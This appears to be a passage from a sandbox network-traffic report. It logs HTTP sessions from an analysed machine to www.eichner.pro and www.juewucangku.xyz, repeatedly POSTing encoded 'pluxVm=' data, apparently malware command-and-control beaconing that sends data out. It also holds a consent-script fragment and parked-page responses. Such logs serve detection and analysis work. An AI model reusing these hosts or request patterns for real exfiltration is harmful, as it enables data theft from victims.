                                                                                                                                                                                                                                Dec 3, 2024 14:56:07.112768888 CET1220INData Raw: 67 70 70 6b 65 79 3d 22 2b 65 6e 63 6f 64 65 55 52 49 43 6f 6d 70 6f 6e 65 6e 74 28 72 29 3a 22 22 29 2b 28 6e 21 3d 22 22 3f 22 26 63 6d 70 61 74 74 3d 22 2b 65 6e 63 6f 64 65 55 52 49 43 6f 6d 70 6f 6e 65 6e 74 28 6e 29 3a 22 22 29 2b 28 22 63
                                                                                                                                                                                                                                Data Ascii: gppkey="+encodeURIComponent(r):"")+(n!=""?"&cmpatt="+encodeURIComponent(n):"")+("cmp_params" in h?"&"+h.cmp_params:"")+(u.cookie.length>0?"&__cmpfcc=1":"")+"&l="+o.toLowerCase()+"&o="+(new Date()).getTime();j.type="text/javascript";j.async=tru
                                                                                                                                                                                                                                Dec 3, 2024 14:56:07.112812996 CET1220INData Raw: 74 2e 6c 65 6e 67 74 68 3d 3d 30 29 7b 74 3d 76 28 22 68 65 61 64 22 29 7d 69 66 28 74 2e 6c 65 6e 67 74 68 3e 30 29 7b 74 5b 30 5d 2e 61 70 70 65 6e 64 43 68 69 6c 64 28 6a 29 7d 7d 7d 7d 29 28 29 3b 77 69 6e 64 6f 77 2e 63 6d 70 5f 61 64 64 46
                                                                                                                                                                                                                                Data Ascii: t.length==0){t=v("head")}if(t.length>0){t[0].appendChild(j)}}}})();window.cmp_addFrame=function(b){if(!window.frames[b]){if(document.body){var a=document.createElement("iframe");a.style.cssText="display:none";if("cmp_cdn" in window&&"cmp_ultra
                                                                                                                                                                                                                                Dec 3, 2024 14:56:07.112854004 CET1220INData Raw: 7d 65 6c 73 65 7b 69 66 28 61 5b 30 5d 3d 3d 3d 22 67 65 74 55 53 50 44 61 74 61 22 29 7b 61 5b 32 5d 28 7b 76 65 72 73 69 6f 6e 3a 31 2c 75 73 70 53 74 72 69 6e 67 3a 77 69 6e 64 6f 77 2e 63 6d 70 5f 72 63 28 22 22 29 7d 2c 74 72 75 65 29 7d 65
                                                                                                                                                                                                                                Data Ascii: }else{if(a[0]==="getUSPData"){a[2]({version:1,uspString:window.cmp_rc("")},true)}else{if(a[0]==="getTCData"){__cmp.a.push([].slice.apply(a))}else{if(a[0]==="addEventListener"||a[0]==="removeEventListener"){__cmp.a.push([].slice.apply(a))}else{
                                                                                                                                                                                                                                Dec 3, 2024 14:56:07.112895966 CET1220INData Raw: 3d 22 67 65 74 47 50 50 44 61 74 61 22 29 7b 72 65 74 75 72 6e 7b 73 65 63 74 69 6f 6e 49 64 3a 33 2c 67 70 70 56 65 72 73 69 6f 6e 3a 31 2c 73 65 63 74 69 6f 6e 4c 69 73 74 3a 5b 5d 2c 61 70 70 6c 69 63 61 62 6c 65 53 65 63 74 69 6f 6e 73 3a 5b
                                                                                                                                                                                                                                Data Ascii: ="getGPPData"){return{sectionId:3,gppVersion:1,sectionList:[],applicableSections:[0],gppString:"",pingData:window.cmp_gpp_ping()}}else{if(g==="hasSection"||g==="getSection"||g==="getField"){return null}else{__gpp.q.push([].slice.apply(a))}}}}}
                                                                                                                                                                                                                                Dec 3, 2024 14:56:07.112973928 CET1220INData Raw: 72 6e 3a 7b 72 65 74 75 72 6e 56 61 6c 75 65 3a 68 2c 73 75 63 63 65 73 73 3a 67 2c 63 61 6c 6c 49 64 3a 62 2e 63 61 6c 6c 49 64 7d 7d 3b 64 2e 73 6f 75 72 63 65 2e 70 6f 73 74 4d 65 73 73 61 67 65 28 61 3f 4a 53 4f 4e 2e 73 74 72 69 6e 67 69 66
                                                                                                                                                                                                                                Data Ascii: rn:{returnValue:h,success:g,callId:b.callId}};d.source.postMessage(a?JSON.stringify(e):e,"*")},"parameter" in b?b.parameter:null,"version" in b?b.version:1)}};window.cmp_setStub=function(a){if(!(a in window)||(typeof(window[a])!=="function"&&t
                                                                                                                                                                                                                                Dec 3, 2024 14:56:07.113020897 CET1220INData Raw: 73 61 62 6c 65 75 73 70 22 20 69 6e 20 77 69 6e 64 6f 77 29 7c 7c 21 77 69 6e 64 6f 77 2e 63 6d 70 5f 64 69 73 61 62 6c 65 75 73 70 29 7b 77 69 6e 64 6f 77 2e 63 6d 70 5f 73 65 74 53 74 75 62 28 22 5f 5f 75 73 70 61 70 69 22 29 7d 69 66 28 21 28
                                                                                                                                                                                                                                Data Ascii: sableusp" in window)||!window.cmp_disableusp){window.cmp_setStub("__uspapi")}if(!("cmp_disablegpp" in window)||!window.cmp_disablegpp){window.cmp_setGppStub("__gpp")};</script><script type="text/javascript">var abp;</script><script type="text/


                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                74192.168.11.204983389.31.143.9080
                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                Dec 3, 2024 14:56:12.601114035 CET677OUTPOST /og0p/ HTTP/1.1
                                                                                                                                                                                                                                Host: www.eichner.pro
                                                                                                                                                                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                                                                                                                                Accept-Encoding: gzip, deflate
                                                                                                                                                                                                                                Accept-Language: en-US,en;q=0.5
                                                                                                                                                                                                                                Origin: http://www.eichner.pro
                                                                                                                                                                                                                                Referer: http://www.eichner.pro/og0p/
                                                                                                                                                                                                                                Content-Length: 203
                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Android 5.1.1; Tablet; rv:41.0) Gecko/41.0 Firefox/41.0
                                                                                                                                                                                                                                Data Raw: 70 6c 75 78 56 6d 3d 58 61 6c 54 36 59 48 55 64 5a 6a 78 45 4d 34 71 72 79 76 73 52 31 70 6d 4d 72 64 4a 72 32 71 31 63 7a 7a 66 42 6c 51 4b 55 66 77 7a 33 39 62 7a 6a 38 65 35 46 5a 4d 35 50 4b 47 6b 7a 68 52 4b 31 33 74 6b 7a 51 6e 51 51 66 67 4e 4c 42 48 47 41 58 47 52 55 38 75 49 50 69 59 73 79 56 4f 52 2f 4e 4e 55 4f 70 6f 48 6c 36 75 69 68 4f 36 70 61 39 72 45 65 32 66 47 6c 31 6f 74 76 4c 75 2f 41 47 36 4b 4b 6d 41 62 54 6d 53 74 69 71 74 49 50 45 69 6f 2f 57 6e 70 6a 45 55 65 78 46 31 69 78 77 72 7a 4f 48 6b 6f 33 73 43 6b 39 4a 72 6a 44 4b 67 59 34 45 6a 6b 44 63 68 63 65 59 6e 43 6f 51 3d 3d
                                                                                                                                                                                                                                Data Ascii: pluxVm=XalT6YHUdZjxEM4qryvsR1pmMrdJr2q1czzfBlQKUfwz39bzj8e5FZM5PKGkzhRK13tkzQnQQfgNLBHGAXGRU8uIPiYsyVOR/NNUOpoHl6uihO6pa9rEe2fGl1otvLu/AG6KKmAbTmStiqtIPEio/WnpjEUexF1ixwrzOHko3sCk9JrjDKgY4EjkDchceYnCoQ==
                                                                                                                                                                                                                                Dec 3, 2024 14:56:12.795176983 CET333INHTTP/1.1 405 Not Allowed
                                                                                                                                                                                                                                Date: Tue, 03 Dec 2024 13:56:12 GMT
                                                                                                                                                                                                                                Content-Type: text/html
                                                                                                                                                                                                                                Content-Length: 154
                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                Server: UD Webspace 3.2
                                                                                                                                                                                                                                Allow: GET, POST, HEAD
                                                                                                                                                                                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                                                Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>openresty</center></body></html>


                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                75192.168.11.204983489.31.143.9080
                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                Dec 3, 2024 14:56:15.326878071 CET697OUTPOST /og0p/ HTTP/1.1
                                                                                                                                                                                                                                Host: www.eichner.pro
                                                                                                                                                                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                                                                                                                                Accept-Encoding: gzip, deflate
                                                                                                                                                                                                                                Accept-Language: en-US,en;q=0.5
                                                                                                                                                                                                                                Origin: http://www.eichner.pro
                                                                                                                                                                                                                                Referer: http://www.eichner.pro/og0p/
                                                                                                                                                                                                                                Content-Length: 223
                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Android 5.1.1; Tablet; rv:41.0) Gecko/41.0 Firefox/41.0
                                                                                                                                                                                                                                Data Raw: 70 6c 75 78 56 6d 3d 58 61 6c 54 36 59 48 55 64 5a 6a 78 46 70 6f 71 6e 7a 76 73 55 56 70 68 44 4c 64 4a 79 47 71 35 63 7a 2f 66 42 6e 39 42 55 70 49 7a 30 5a 4c 7a 69 35 71 35 4c 35 4d 35 48 71 47 62 33 68 51 47 31 33 68 73 7a 55 6e 51 51 5a 4d 4e 4c 42 33 47 41 67 61 53 47 63 75 47 57 53 59 69 39 31 4f 52 2f 4e 4e 55 4f 70 38 35 6c 36 32 69 68 2b 4b 70 61 63 71 32 64 32 65 30 6f 6c 6f 74 72 4c 76 30 41 47 36 53 4b 69 5a 30 54 67 57 74 69 76 70 49 50 57 4b 72 77 57 6e 72 6e 45 56 73 2f 58 64 73 31 69 62 36 50 55 38 54 32 75 44 62 78 2f 6d 35 65 34 55 38 37 58 2f 57 48 73 59 30 63 61 6d 5a 31 58 61 6a 55 6a 41 78 36 65 73 76 36 39 66 69 47 6d 68 59 2f 72 41 3d
                                                                                                                                                                                                                                Data Ascii: pluxVm=XalT6YHUdZjxFpoqnzvsUVphDLdJyGq5cz/fBn9BUpIz0ZLzi5q5L5M5HqGb3hQG13hszUnQQZMNLB3GAgaSGcuGWSYi91OR/NNUOp85l62ih+Kpacq2d2e0olotrLv0AG6SKiZ0TgWtivpIPWKrwWnrnEVs/Xds1ib6PU8T2uDbx/m5e4U87X/WHsY0camZ1XajUjAx6esv69fiGmhY/rA=
                                                                                                                                                                                                                                Dec 3, 2024 14:56:15.527430058 CET333INHTTP/1.1 405 Not Allowed
                                                                                                                                                                                                                                Date: Tue, 03 Dec 2024 13:56:15 GMT
                                                                                                                                                                                                                                Content-Type: text/html
                                                                                                                                                                                                                                Content-Length: 154
                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                Server: UD Webspace 3.2
                                                                                                                                                                                                                                Allow: GET, POST, HEAD
                                                                                                                                                                                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                                                Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>openresty</center></body></html>


                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                76192.168.11.204983589.31.143.9080
                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                Dec 3, 2024 14:56:18.061311960 CET2578OUTPOST /og0p/ HTTP/1.1
                                                                                                                                                                                                                                Host: www.eichner.pro
                                                                                                                                                                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                                                                                                                                Accept-Encoding: gzip, deflate
                                                                                                                                                                                                                                Accept-Language: en-US,en;q=0.5
                                                                                                                                                                                                                                Origin: http://www.eichner.pro
                                                                                                                                                                                                                                Referer: http://www.eichner.pro/og0p/
                                                                                                                                                                                                                                Content-Length: 7371
                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Android 5.1.1; Tablet; rv:41.0) Gecko/41.0 Firefox/41.0
                                                                                                                                                                                                                                Data Raw: 70 6c 75 78 56 6d 3d 58 61 6c 54 36 59 48 55 64 5a 6a 78 46 70 6f 71 6e 7a 76 73 55 56 70 68 44 4c 64 4a 79 47 71 35 63 7a 2f 66 42 6e 39 42 55 70 41 7a 30 72 44 7a 69 65 32 35 49 35 4d 35 4a 4b 47 61 33 68 51 4c 31 32 4a 6f 7a 55 69 74 51 61 34 4e 49 6a 2f 47 47 55 75 53 4d 63 75 47 65 79 59 76 79 56 50 56 2f 4e 64 51 4f 70 73 35 6c 36 32 69 68 38 53 70 63 4e 71 32 62 32 66 47 6c 31 6f 58 76 4c 76 63 41 43 57 6f 4b 69 56 65 54 51 32 74 6a 50 35 49 49 6c 69 72 39 57 6e 74 67 45 56 30 2f 58 41 75 31 69 47 46 50 52 6f 31 32 70 58 62 37 2b 58 5a 43 70 78 68 74 48 76 56 45 73 51 33 54 36 4f 37 34 45 4f 6b 45 6a 73 71 6b 4c 49 6b 38 4e 4c 43 44 33 4e 7a 69 66 71 41 4e 69 4b 78 69 44 2f 76 44 72 4c 31 5a 44 33 70 67 4c 47 54 65 37 4c 59 67 30 65 68 41 69 70 4a 58 6f 61 34 71 39 77 39 5a 52 77 31 56 4d 6a 4f 35 71 72 52 63 7a 59 50 62 34 53 7a 77 39 59 4e 66 47 55 43 37 70 2b 2b 33 76 68 57 55 46 75 71 41 36 76 75 41 36 57 42 33 6f 53 50 68 35 79 70 6e 31 39 6d 77 50 39 74 61 51 68 4a 38 63 33 47 78 37 6e [TRUNCATED]
                                                                                                                                                                                                                                Data Ascii: pluxVm=XalT6YHUdZjxFpoqnzvsUVphDLdJyGq5cz/fBn9BUpAz0rDzie25I5M5JKGa3hQL12JozUitQa4NIj/GGUuSMcuGeyYvyVPV/NdQOps5l62ih8SpcNq2b2fGl1oXvLvcACWoKiVeTQ2tjP5IIlir9WntgEV0/XAu1iGFPRo12pXb7+XZCpxhtHvVEsQ3T6O74EOkEjsqkLIk8NLCD3NzifqANiKxiD/vDrL1ZD3pgLGTe7LYg0ehAipJXoa4q9w9ZRw1VMjO5qrRczYPb4Szw9YNfGUC7p++3vhWUFuqA6vuA6WB3oSPh5ypn19mwP9taQhJ8c3Gx7n3aZmbgpsOH2Hoiw1jBO8aJ1dpeafpwsyqik39A0Xt72KFIQHCHGA3oylD6w6LxFpGzyRvb/awk1ADw7yr3BposNcqGyBgWp0o2sE/C/G3GJ/H4gIEBv4B+xRiQhKPkvYgW/HBzedCSUjO6PXK76nH/VQwj7i3O636v3EwRPBv8fWlnbwedCM72Wiq1L9Z1sgXL5gBkMRN3fbfqupQRAYoEMBIDQSBwQyjiouSjjcmy/3IWN7MYonmNZ62vF69Z4mNG5vqDOI+RX1M9PQA4BYYXu1CnnnpumiTMmDHVxiFcK6lx3pHU0AOgMKhkW+qeDXV0H6mabVgKFmEC3yLLmEq22pAyj8lTghUxsen9QjYxTh94PLuddnAjSvA4pVeGtKmE69lxA9IUGzQarVoPNZtlq7bGzlDRWat9aqLfv032/lT4PVL78ndNVCtVJ1T/iOy1OLMV0v8MRj+NlLH28TVgLrlI85xQ70eNIXGWaD6IS9r8wNN2VN8rIAJ6iHpt9f3/sBxf4pmJTTjHpHJ7KhEwONIWqUepsuz0ZGKgqeJiVa7wCzCr6RIPvugKBe8SkxZ4UkB9cNfproRoJOzXlPCQEJWl2x5+YKHTSedTFBu3JE/ErbcQoO58MfkZw8sna2Ug9xtHybTMlV/1QdH99E6owFGc3KSlOTEi [TRUNCATED]
                                                                                                                                                                                                                                Dec 3, 2024 14:56:18.061377048 CET5268OUTData Raw: 78 63 4f 53 79 4c 31 4b 49 64 52 59 6c 7a 70 50 66 76 6d 33 6d 6c 45 63 4e 52 4a 2b 56 6d 4f 57 6a 37 6b 6e 4a 52 6c 57 66 56 5a 4a 51 57 4e 42 64 66 74 62 70 74 55 2f 63 6a 6b 57 4e 59 6a 66 64 32 39 78 36 34 35 70 76 6f 6e 6b 38 62 39 34 78 53
                                                                                                                                                                                                                                Data Ascii: xcOSyL1KIdRYlzpPfvm3mlEcNRJ+VmOWj7knJRlWfVZJQWNBdftbptU/cjkWNYjfd29x645pvonk8b94xSpJwYaxyFBKX96lzXs1dd8P/jgIPeF/la0/2I1VYFfpO/oj4ni47RKU0esYunwq9WGrHzKiXC3qTR4g+vDkVC2Xd3G4QE/CzmPfahPUzPerp0uY1D9m4O2t/JrERy2di3GVkL/DX5eChROL/wjqUO28tSPdIZGn6vF
                                                                                                                                                                                                                                Dec 3, 2024 14:56:18.262478113 CET333INHTTP/1.1 405 Not Allowed
                                                                                                                                                                                                                                Date: Tue, 03 Dec 2024 13:56:18 GMT
                                                                                                                                                                                                                                Content-Type: text/html
                                                                                                                                                                                                                                Content-Length: 154
                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                Server: UD Webspace 3.2
                                                                                                                                                                                                                                Allow: GET, POST, HEAD
                                                                                                                                                                                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                                                Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>openresty</center></body></html>


                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                77192.168.11.204983689.31.143.9080
                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                Dec 3, 2024 14:56:20.785655975 CET418OUTGET /og0p/?pluxVm=aYNz5vX3IaeBLII2gGf9eURLdfN+pzrBFxzqHFB0Zc0E767K5MaAH/EqLovM7A815HxojS38W68HbT3JNl21N4jIU1lh5jKS99Zmbqcxop+R6eeWU//8U3E=&Z1EO=OvfHeluUy HTTP/1.1
                                                                                                                                                                                                                                Host: www.eichner.pro
                                                                                                                                                                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                                                                                                                                Accept-Language: en-US,en;q=0.5
                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Android 5.1.1; Tablet; rv:41.0) Gecko/41.0 Firefox/41.0
                                                                                                                                                                                                                                Dec 3, 2024 14:56:20.978429079 CET159INHTTP/1.1 200 OK
                                                                                                                                                                                                                                Date: Tue, 03 Dec 2024 13:56:20 GMT
                                                                                                                                                                                                                                Content-Type: text/html
                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                Server: UD Webspace 3.2
                                                                                                                                                                                                                                Data Raw: 31 39 65 30 0d 0a
                                                                                                                                                                                                                                Data Ascii: 19e0
                                                                                                                                                                                                                                Dec 3, 2024 14:56:20.978614092 CET1289INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 64 65 22 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 63 6f 6e 74 65 6e 74 3d 22 44 6f 6d 61 69 6e 20 72 65 67 69 73
                                                                                                                                                                                                                                Data Ascii: <!DOCTYPE html><html lang="de"><head><meta name="description"content="Domain registriert bei united-domains.de"><meta http-equiv="Content-Type"content="text/html; charset=UTF-8"><title>Domain im Kundenauftrag registriert</title><style>body,htm
                                                                                                                                                                                                                                Dec 3, 2024 14:56:20.978938103 CET1289INData Raw: 41 50 59 61 64 38 47 41 36 41 41 41 41 41 58 52 53 54 6c 4d 41 51 4f 62 59 5a 67 41 41 42 38 70 4a 52 45 46 55 65 4e 72 74 6d 6f 75 53 6f 79 6f 51 51 42 73 78 43 42 68 41 35 50 48 2f 6e 33 70 74 6e 6f 62 64 5a 4a 78 39 31 63 79 74 6e 4b 70 4a 43
                                                                                                                                                                                                                                Data Ascii: APYad8GA6AAAAAXRSTlMAQObYZgAAB8pJREFUeNrtmouSoyoQQBsxCBhA5PH/n3ptnobdZJx91cytnKpJCELTHkHJbuDN94WwVSFihjefhggXYwwhRHyzHN58BqJCDEbNal1nE5Eg4M1lePB2JcSGeMK/V/JVjCU438SqQjzznoSXIH6FyqScESIWgoE3F/wJqMxhSm/MWhRo4tvgx1gBHUZayfuofFzh/wpTDP4Eyjzb1oCPB/
                                                                                                                                                                                                                                Dec 3, 2024 14:56:20.978996038 CET1289INData Raw: 34 7a 32 77 33 36 44 37 57 50 79 31 51 48 2b 36 4b 4f 79 53 51 47 51 32 46 7a 65 43 4e 61 50 36 2b 48 54 58 42 4d 62 7a 58 64 78 41 51 51 43 38 66 67 72 50 5a 6c 78 51 33 73 61 52 41 4d 2b 66 77 75 64 72 56 73 71 52 76 42 5a 34 7a 74 64 65 45 44
                                                                                                                                                                                                                                Data Ascii: 4z2w36D7WPy1QH+6KOySQGQ2FzeCNaP6+HTXBMbzXdxAQQC8fgrPZlxQ3saRAM+fwudrVsqRvBZ4ztdeEDhNkDAXBfL4gPlQYKjGmaqdg+GMKRMiPOwDWd8HVjwhLr6kXw9VPjIgvO4Dq0lft57Y/KXAni9wFy8IVNGblbE1XBM47venDwXa2IBxPo1X5AeBqxie3aE8RYYV/PybyByG+Uo+EKji5x4idvTxmiEjAR8KZA++RBg
                                                                                                                                                                                                                                Dec 3, 2024 14:56:20.979039907 CET1289INData Raw: 48 4d 42 77 36 55 5a 69 45 47 77 30 35 65 47 33 72 56 47 61 33 51 42 57 48 42 50 6e 61 78 69 49 52 32 37 4c 2f 68 42 45 69 42 33 66 59 50 6c 71 4c 67 42 4e 6c 39 79 4f 33 77 6c 6b 70 44 55 68 6b 70 63 31 61 6c 4a 2f 6f 7a 46 57 72 50 55 54 74 6a
                                                                                                                                                                                                                                Data Ascii: HMBw6UZiEGw05eG3rVGa3QBWHBPnaxiIR27L/hBEiB3fYPlqLgBNl9yO3wlkpDUhkpc1alJ/ozFWrPUTtj+qDwiSxw0HaaQR6VA7hKghMPMSqf/AOVXTmgqvu9mAAAAAElFTkSuQmCC');overflow:hidden;text-indent:-9999px;font-size:0;color:rgba(255,255,255,0);text-align:left}#logo img{b
                                                                                                                                                                                                                                Dec 3, 2024 14:56:20.979083061 CET1289INData Raw: 20 62 65 69 20 6a 65 64 65 72 20 6e 65 75 65 6e 20 44 6f 6d 61 69 6e 20 68 69 6e 74 65 72 6c 65 67 74 20 75 6e 64 20 7a 65 69 67 74 2c 20 64 61 73 73 20 64 69 65 20 6e 65 75 65 20 44 6f 6d 61 69 6e 20 65 72 72 65 69 63 68 62 61 72 20 69 73 74 2e
                                                                                                                                                                                                                                Data Ascii: bei jeder neuen Domain hinterlegt und zeigt, dass die neue Domain erreichbar ist.<br>Ohne diese Platzhalter-Seite w&uuml;rden Besucher eine Fehlermeldung erhalten. Als Kunde von united-domains k&ouml;nnen Sie diese Domain in Ihrem <a href="ht
                                                                                                                                                                                                                                Dec 3, 2024 14:56:20.979120016 CET186INData Raw: 65 6e 73 63 68 75 74 7a 68 69 6e 77 65 69 73 65 3c 2f 61 3e 3c 2f 70 3e 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 66 6f 6f 74 65 72 2d 77 72 61 70 70 65 72 22 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 66 6f 6f 74 65 72
                                                                                                                                                                                                                                Data Ascii: enschutzhinweise</a></p></div></div><div class="footer-wrapper"><div class="footer">&copy; united-domains AG. <span>&nbsp;Alle Rechte vorbehalten.</span></div></div></body></html>0


                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                78192.168.11.20498378.136.96.10680
                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                Dec 3, 2024 14:56:26.376046896 CET689OUTPOST /mia8/ HTTP/1.1
                                                                                                                                                                                                                                Host: www.juewucangku.xyz
                                                                                                                                                                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                                                                                                                                Accept-Encoding: gzip, deflate
                                                                                                                                                                                                                                Accept-Language: en-US,en;q=0.5
                                                                                                                                                                                                                                Origin: http://www.juewucangku.xyz
                                                                                                                                                                                                                                Referer: http://www.juewucangku.xyz/mia8/
                                                                                                                                                                                                                                Content-Length: 203
                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Android 5.1.1; Tablet; rv:41.0) Gecko/41.0 Firefox/41.0
                                                                                                                                                                                                                                Data Raw: 70 6c 75 78 56 6d 3d 6f 4c 43 51 74 45 69 6e 75 48 72 5a 55 4f 54 2b 6c 2b 41 77 49 37 47 75 46 37 37 6e 4b 6d 79 69 62 76 34 55 76 39 2b 48 51 5a 39 6f 55 6a 2f 30 2b 46 2b 38 6f 34 71 7a 64 49 45 74 33 36 72 68 34 32 70 59 65 33 2b 72 72 79 70 79 38 38 63 35 49 32 78 4e 34 72 2b 64 78 39 45 49 63 55 72 57 78 33 68 61 56 2b 62 46 4f 6a 75 65 59 56 54 53 73 46 30 53 36 4d 62 63 59 4e 76 6b 38 47 67 49 2f 4d 37 70 55 47 64 63 79 62 62 56 57 37 4d 33 69 5a 31 59 58 50 72 6a 32 50 77 57 58 5a 69 6b 77 51 67 51 77 68 38 32 38 58 61 38 42 4f 2b 69 49 6f 35 34 63 52 58 2b 41 5a 37 30 2f 71 6b 44 59 67 3d 3d
                                                                                                                                                                                                                                Data Ascii: pluxVm=oLCQtEinuHrZUOT+l+AwI7GuF77nKmyibv4Uv9+HQZ9oUj/0+F+8o4qzdIEt36rh42pYe3+rrypy88c5I2xN4r+dx9EIcUrWx3haV+bFOjueYVTSsF0S6MbcYNvk8GgI/M7pUGdcybbVW7M3iZ1YXPrj2PwWXZikwQgQwh828Xa8BO+iIo54cRX+AZ70/qkDYg==
                                                                                                                                                                                                                                Dec 3, 2024 14:56:26.752474070 CET403INHTTP/1.1 301 Moved Permanently
                                                                                                                                                                                                                                Server: nginx
                                                                                                                                                                                                                                Date: Tue, 03 Dec 2024 13:56:26 GMT
                                                                                                                                                                                                                                Content-Type: text/html
                                                                                                                                                                                                                                Content-Length: 162
                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                Location: https://www.juewucangku.xyz/mia8/
                                                                                                                                                                                                                                Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                                                Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></html>


